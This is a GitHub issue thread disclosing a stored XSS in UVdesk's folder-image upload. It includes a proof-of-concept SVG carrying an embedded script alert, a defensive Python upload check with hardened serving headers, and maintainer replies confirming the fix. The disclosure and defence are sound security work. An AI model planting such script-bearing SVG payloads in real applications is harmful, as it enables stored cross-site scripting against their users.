
Folder Image allows upload .svg file and execute arbitrary javascript code #494

Closed
noobpk opened this issue Dec 10, 2021 · 7 comments


noobpk commented Dec 10, 2021

Description
Stored XSS via 'Folder Image' when adding a folder

How to reproduce

  1. Go to Folders and choose New Folder
  2. Choose a Folder Image with a .svg file containing the payload
    Example SVG:

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS");
   </script>
</svg>
```

The XSS triggers when the folder image is accessed.
Example: https://demo.uvdesk.com/uvdesk-demo-118-70-149-30//assets/knowledgebase/lIkHGHFooTYEKQOu.svg

Possible Solution
Use CSP, or don't allow uploading the .svg extension.

Additional context
Disclosure : https://huntr.dev/bounties/31e2217a-aa0c-4d0a-96ec-0bc1987a2808/
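A defensive check in the spirit of the proposed fix, added here as an example and not UVdesk's own code: it classifies the upload by content rather than by file name, rejects SVG while recording why the report's SVG would run script (so the attempt can be logged), and returns the headers one would serve uploads with so that a file that does slip through cannot run script in the application's origin. Function names and the sample inputs are constructed for this example.

```python
"""Content-based acceptance check for 'folder image' uploads and hardened
headers for serving user files. Added example, not UVdesk code."""
import xml.etree.ElementTree as ET

# Folder images are limited to raster formats, identified by magic bytes so
# the decision never depends on the client-supplied file name or extension.
RASTER_MAGIC = {b"\x89PNG\r\n\x1a\n": "image/png", b"\xff\xd8\xff": "image/jpeg",
                b"GIF87a": "image/gif", b"GIF89a": "image/gif"}

def raster_type(data):
    """MIME type if the bytes begin with a known raster signature, else None."""
    return next((m for sig, m in RASTER_MAGIC.items() if data.startswith(sig)), None)

def svg_script_findings(data):
    """Why an SVG would run script if opened as a page (useful for logging)."""
    try:
        root = ET.fromstring(data)  # expat does not fetch external DTDs/entities
    except ET.ParseError:
        return ["not well-formed XML"]
    findings = []
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1].lower() == "script":
            findings.append("script element")
        for attr, value in el.attrib.items():
            local = attr.rsplit("}", 1)[-1].lower()
            if local.startswith("on"):
                findings.append("event handler " + local)
            elif local == "href" and value.strip().lower().startswith("javascript:"):
                findings.append("javascript: href")
    return findings

def accept_folder_image(data):
    """Return (accepted, reason); SVG is rejected whatever its extension."""
    mime = raster_type(data)
    if mime:
        return True, mime
    if b"<svg" in data[:4096].lower():
        return False, "svg rejected: " + (", ".join(svg_script_findings(data)) or "no script")
    return False, "unsupported image format"

def upload_response_headers():
    """Headers so a served upload runs no script when navigated to directly."""
    return {"Content-Security-Policy": "sandbox; script-src 'none'",
            "Content-Disposition": "attachment", "X-Content-Type-Options": "nosniff"}
# Constructed samples: the report's SVG (DOCTYPE dropped) and a PNG signature.
REPORTED_SVG = b"""<?xml version="1.0" standalone="no"?>
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <script type="text/javascript">alert("XSS");</script>
</svg>"""
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
```

The check is on the stored bytes only; the response headers apply whenever the stored file is served back to a browser.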

@vipin-shrivastava
Contributor

@noobpk

Thanks, we will check & fix it soon.


noobpk commented Dec 10, 2021

> @noobpk
>
> Thanks, we will check & fix it soon.

I found the vulnerability 2 months ago but I don't know why huntr's system didn't send it to you.
After checking the vulnerability, please validate my report on huntr.

Thanks ^^!!

@vipin-shrivastava
Contributor

Thanks @noobpk, we found this security issue & have also fixed it.

@vipin-shrivastava
Contributor

@noobpk, not able to validate your report on huntr.
[image]


noobpk commented Dec 17, 2021

> @noobpk, not able to validate your report on huntr.
> [image]

@vipin-shrivastava You need to log in to the Huntr platform with a maintainer account, because the report is private. Only the maintainer and reporter can view the report ^^!!

@vipin-shrivastava
Contributor

> > @noobpk, not able to validate your report on huntr.
> > [image]
>
> @vipin-shrivastava You need to log in to the Huntr platform with a maintainer account, because the report is private. Only the maintainer and reporter can view the report ^^!!

done 👍


noobpk commented Dec 17, 2021

> > > @noobpk, not able to validate your report on huntr.
> > > [image]
> >
> > @vipin-shrivastava You need to log in to the Huntr platform with a maintainer account, because the report is private. Only the maintainer and reporter can view the report ^^!!
>
> done 👍

Thanks. I see you fixed that. It would be great if you confirmed the fix on huntr to change the report status to public. ♥️
